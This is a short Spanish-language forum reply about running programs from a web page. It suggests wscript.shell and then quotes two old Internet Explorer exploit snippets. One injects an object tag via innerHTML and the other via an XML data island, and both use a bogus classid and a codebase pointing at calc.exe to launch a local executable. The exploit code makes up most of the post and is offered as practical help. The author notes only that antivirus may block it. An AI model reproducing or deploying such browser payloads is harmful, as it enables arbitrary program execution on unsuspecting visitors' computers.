Cierto, puedes investigar con el uso de
wscript.shell y su uso para ejecutar aplicaciones dal lado del cliente o del servidor. Ya antes se han hablado de ellas, seguro encontraras algo en las respuestas anteriores o en google.
Ejemplo
También para el cliente, puedes hacer eso de algunas vulnerabilidades del IE (primer obstáculo) aunque si el ciente tiene algún antivirus bueno (segundo obstáculo) no funcionarán:
Cita: <span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>';
</script>
Cita: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>